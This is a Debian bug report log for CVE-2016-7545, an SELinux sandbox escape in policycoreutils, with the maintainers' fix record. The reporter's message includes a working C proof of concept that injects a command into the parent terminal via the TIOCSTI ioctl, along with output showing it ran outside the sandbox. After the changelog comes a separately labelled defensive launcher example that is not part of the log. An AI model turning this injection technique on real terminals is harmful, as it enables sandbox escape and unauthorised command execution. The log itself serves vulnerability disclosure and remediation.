policycoreutils: CVE-2016-7545: SELinux sandbox escape via TIOCSTI ioctl

Related Vulnerabilities: CVE-2016-7545, CVE-2016-2568, CVE-2016-2779

Debian Bug report logs - #838599

Reported by: up201407890@alunos.dcc.fc.up.pt

Date: Thu, 22 Sep 2016 19:15:02 UTC

Severity: important

Tags: fixed-upstream, security, sid, stretch, upstream

Found in version policycoreutils/2.3-1

Fixed in version policycoreutils/2.5-3

Done: Laurent Bigonville <bigon@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>:
Bug#838599; Package policycoreutils. (Thu, 22 Sep 2016 19:15:05 GMT)


Acknowledgement sent to up201407890@alunos.dcc.fc.up.pt:
New Bug report received and forwarded. Copy sent to Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>. (Thu, 22 Sep 2016 19:15:05 GMT)


Message #5 received at submit@bugs.debian.org:

From: up201407890@alunos.dcc.fc.up.pt
To: submit@bugs.debian.org
Subject: policycoreutils SELinux sandbox escape via TIOCSTI ioctl
Date: Thu, 22 Sep 2016 21:10:31 +0200
Package: policycoreutils
Severity: important
Tags: security

Hi,

When executing a program via the SELinux sandbox, the nonpriv session  
can escape to the parent session by using the TIOCSTI ioctl to push  
characters into the terminal's input buffer, allowing an attacker to  
escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
[saken@ghetto ~]$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


This is similar to CVE-2016-2568, CVE-2016-2779, etc.

Thanks,
Federico Bento.






Changed Bug title to 'policycoreutils: CVE-2016-7545: SELinux sandbox escape via TIOCSTI ioctl' from 'policycoreutils SELinux sandbox escape via TIOCSTI ioctl'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 25 Sep 2016 13:27:04 GMT)


Added tag(s) fixed-upstream and upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 25 Sep 2016 13:27:04 GMT)


Marked as found in versions policycoreutils/2.3-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 25 Sep 2016 13:27:05 GMT)


Added tag(s) stretch and sid. Request was from Laurent Bigonville <bigon@debian.org> to control@bugs.debian.org. (Tue, 27 Sep 2016 11:27:03 GMT)


Reply sent to Laurent Bigonville <bigon@debian.org>:
You have taken responsibility. (Tue, 27 Sep 2016 22:33:22 GMT)


Notification sent to up201407890@alunos.dcc.fc.up.pt:
Bug acknowledged by developer. (Tue, 27 Sep 2016 22:33:22 GMT)


Message #18 received at 838599-close@bugs.debian.org:

From: Laurent Bigonville <bigon@debian.org>
To: 838599-close@bugs.debian.org
Subject: Bug#838599: fixed in policycoreutils 2.5-3
Date: Tue, 27 Sep 2016 22:29:39 +0000
Source: policycoreutils
Source-Version: 2.5-3

We believe that the bug you reported is fixed in the latest version of
policycoreutils, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 838599@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Laurent Bigonville <bigon@debian.org> (supplier of updated policycoreutils package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Tue, 27 Sep 2016 22:30:28 +0200
Source: policycoreutils
Binary: policycoreutils policycoreutils-python-utils python-sepolicy policycoreutils-gui policycoreutils-dev policycoreutils-sandbox restorecond mcstrans newrole
Architecture: source amd64 all
Version: 2.5-3
Distribution: unstable
Urgency: medium
Maintainer: Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>
Changed-By: Laurent Bigonville <bigon@debian.org>
Description:
 mcstrans   - SELinux core policy utilities (mcstrans utilities)
 newrole    - SELinux core policy utilities (newrole application for RBAC/MLS)
 policycoreutils - SELinux core policy utilities
 policycoreutils-dev - SELinux core policy utilities (development utilities)
 policycoreutils-gui - SELinux core policy utilities (graphical utilities)
 policycoreutils-python-utils - SELinux core policy utilities (Python utilities)
 policycoreutils-sandbox - SELinux core policy utilities (graphical sandboxes)
 python-sepolicy - Python binding for SELinux Policy Analyses
 restorecond - SELinux core policy utilities (restorecond utilities)
Closes: 836289 838599
Changes:
 policycoreutils (2.5-3) unstable; urgency=medium
 .
   * Team upload.
   * d/p/Dont_use_subprocess_getstatusoutput_in_Python_2_code.patch: Make the
     python code of chcat and sandbox compatible with both python2 and python3
   * debian/NEWS, debian/control: Fix a typo
   * Merge Fedora changes to the selinux-autorelabel systemd scripts and units.
     We now use a selinux-autorelabel.target and a generator that override the
     default.target in case we need to relabel the filesystems.
   * debian/patches/sandbox-dbus-run-session.patch: Use dbus-run-session
     instead of dbus-launch when available (Closes: #836289)
   * debian/patches/CVE-2016-7545.patch: create a new session for sandboxed
     processes (Closes: #838599 CVE-2016-7545)
   * debian/patches/sandbox-gobject-gtk.patch: Use GTK+ GObject introspection
     bindings instead of old pygtk2 ones
   * debian/patches/sandbox-x-window-manager.patch: Use system default window
     manager instead of openbox
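Added example, not part of this bug log and not the Debian or upstream patch: the changelog above describes the fix as creating a new session for sandboxed processes, and the C sketch below shows that step in a launcher that refuses to exec when it cannot confirm the child has lost its controlling terminal. The names detach_from_terminal and run_in_new_session and the sample command are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Child-side step: leave the caller's session so the invoking shell's
 * terminal is no longer ours. Returns 0 when confirmed, -1 otherwise. */
static int detach_from_terminal(void)
{
    if (setsid() == (pid_t)-1)      /* fails if we are a process-group leader */
        return -1;
    if (getsid(0) != getpid())      /* we must now lead a fresh session */
        return -1;
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd >= 0) {                  /* a controlling terminal is still attached */
        close(fd);
        return -1;
    }
    return 0;
}

/* Hypothetical launcher (assumed name): fork, isolate, then exec argv.
 * Returns the program's exit status, 126 if isolation could not be
 * confirmed (fail closed), 127 if exec failed, -1 on fork/wait errors. */
int run_in_new_session(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (detach_from_terminal() != 0)
            _exit(126);             /* never run untrusted code unisolated */
        execvp(argv[0], argv);
        _exit(127);
    }
    int status;
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *const argv[] = { "id", NULL };  /* constructed sample command */
    return run_in_new_session(argv);
}
```

The kernel accepts TIOCSTI from an unprivileged caller only on that caller's controlling terminal, so a child started this way gets an error from the ioctl even though it still inherits the terminal as fd 0.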




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 31 Oct 2016 07:31:14 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 13:50:34 2019; Machine Name: buxtehude
